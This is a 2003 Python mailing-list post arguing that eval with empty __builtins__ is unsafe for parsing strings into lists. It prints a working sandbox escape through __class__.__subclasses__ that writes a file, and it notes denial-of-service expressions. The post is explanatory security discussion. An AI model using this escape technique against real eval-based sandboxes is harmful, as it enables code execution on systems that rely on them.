STRING TO LIST

Beni Cherniavsky cben at techunix.technion.ac.il
Wed Apr 9 13:35:21 EDT 2003


Duncan Booth wrote on 2003-04-09:

> While this works, the original poster should be aware that unless
> he/she has full control over the origin of the string, it could have
> nasty side effects, since the string could do things like opening
> files or even executing arbitrary Python code.

Indeed.  One other attack, except for calling builtins, is mutating
variables local to the caller of `eval` with list comprehnsions.
This means that even untrusted safely evaled code that doesn't itself
have access to builtins, better use a safe eval for third code that it
doesn't trust (sandbox in sandbox).

> Of course this may not be relevant, but in case it is, a better solution
> is:
>
> >>> x=str("[[12,13],[14,15]]")
> >>> print eval(x, {'__builtins__': {}})
> [[12, 13], [14, 15]]
> >>>
>
Is this completely safe?  First, note that you must catch all
exceptions, because of e.g.:

>>> eval('''1/0''', {'__builtins__': {}})
Traceback (most recent call last):
  File "<stdin>", line 1, in ?
  File "<string>", line 0, in ?
ZeroDivisionError: integer division or modulo by zero

Futhermore, can't one do some nasty thing through attributes of
builtin types?  Here is a simple security hole (probaly highly
dependant on specific python versions):

Python 2.2.2 (#1, Jan 30 2003, 21:26:22)
[GCC 2.96 20000731 (Red Hat Linux 7.3 2.96-112)] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> "".__class__
<type 'str'>
>>> "".__class__.__class__
<type 'type'>
>>> "".__class__.__base__
<type 'object'>
>>> dir(type)
['__base__', '__bases__', '__basicsize__', '__call__', '__class__',
'__cmp__', '__delattr__', '__dict__', '__dictoffset__', '__doc__',
'__flags__', '__getattribute__', '__hash__', '__init__',
'__itemsize__', '__module__', '__mro__', '__name__', '__new__',
'__reduce__', '__repr__', '__setattr__', '__str__', '__subclasses__',
'__weakrefoffset__', 'mro']
>>> type.__subclasses__(object)
[<type 'type'>, <type 'list'>, <type 'NoneType'>,
<type 'NotImplementedType'>, <type 'module'>,
<type 'posix.stat_result'>, <type 'posix.statvfs_result'>,
<type 'dict'>, <type 'function'>, <type 'str'>, <type 'file'>]
>>> eval('''[t for t in
...          "".__class__.__class__.__subclasses__(
...                                     "".__class__.__base__)
...          if t.__name__ == "file"][0]''',
...      {'__builtins__': {}})
<type 'file'>
>>> eval('''[t for t in
...          "".__class__.__class__.__subclasses__(
...                                     "".__class__.__base__)
...          if t.__name__ == "file"][0]('CRACK', 'w')''',
...      {'__builtins__': {}})
Traceback (most recent call last):
  File "<stdin>", line 1, in ?
  File "<string>", line 1, in ?
IOError: file() constructor not accessible in restricted mode

What?!  They think they are smarter than I am :-)?  OK, they got me
this time.  How is this "restricted mode" detected anyway?  Does
`file` look up the stack frame to see if it's called from eval, or if
it has no `__builtins__`?  Is it a permanent mode of the interpreter
itself?

In any case, this is something special coded into `file`.  But the
`type..__subclasses__(object)` list above shows all classes your
runtime has, from any modules.  In any big program there would be one
that is not protected:

>>> class foo(object):
...   def __init__(self, fname):
...     file(fname, 'w')
...
>>> type.__subclasses__(object)
[<type 'type'>, <type 'list'>, <type 'NoneType'>,
<type 'NotImplementedType'>, <type 'module'>,
<type 'posix.stat_result'>, <type 'posix.statvfs_result'>,
<type 'dict'>, <type 'function'>, <type 'str'>, <type 'file'>,
<class '__main__.foo'>]

Indeed, any class appears!  Now, if happen to know about this class in
your code, or write some byte-code disassembling thingie for finding
such classes automatically (I'm pretty sure that lambdas together with
list comprehensions are turing-complete), I'm in:

>>> eval('''[t for t in
...      "".__class__.__class__.__subclasses__(
...                                 "".__class__.__base__)
...      if t.__name__ == "foo"][0]('CRACK')''',
...      {'__builtins__': {}})
<__main__.foo object at 0x811c4ec>
>>>
[1]+  Stopped                 python2
cben at sc8-pr-shell1:~$ ls CRACK
CRACK

See?

Another point is that it's trivial to write fairly short list
comprehensions that will block for very long or infinite times and
possibly explode you memory.  Actually you don't need list
comprehensions for this, something as simple as ``eval('2**(2**20)')``
took too long for my patience...  So the safest `eval` will always be
open to denial-of-service attacks!  I wonder whether timeout and a
memory limit can be implemented to avoid it...

Still, frequently you don't need the flexibility of allowing real code
(with more or less restrictions), you just want to read some constant
data.  It's the most natural thing for a LISPer: read without eval.
OK, in Python *there isn't* any read syntax for lists, tuples and
dicts, there are only "dysplays" (the analogue of the list function as
compared to the quote special form).  But it'd be trivial to define.
So why doesn't python have some builtin to parse it?  (Don't tell me
about pickle, it's not very readable <wink> and certainly not
secure...).

-- 
Beni Cherniavsky <cben at tx.technion.ac.il>





More information about the Python-list mailing list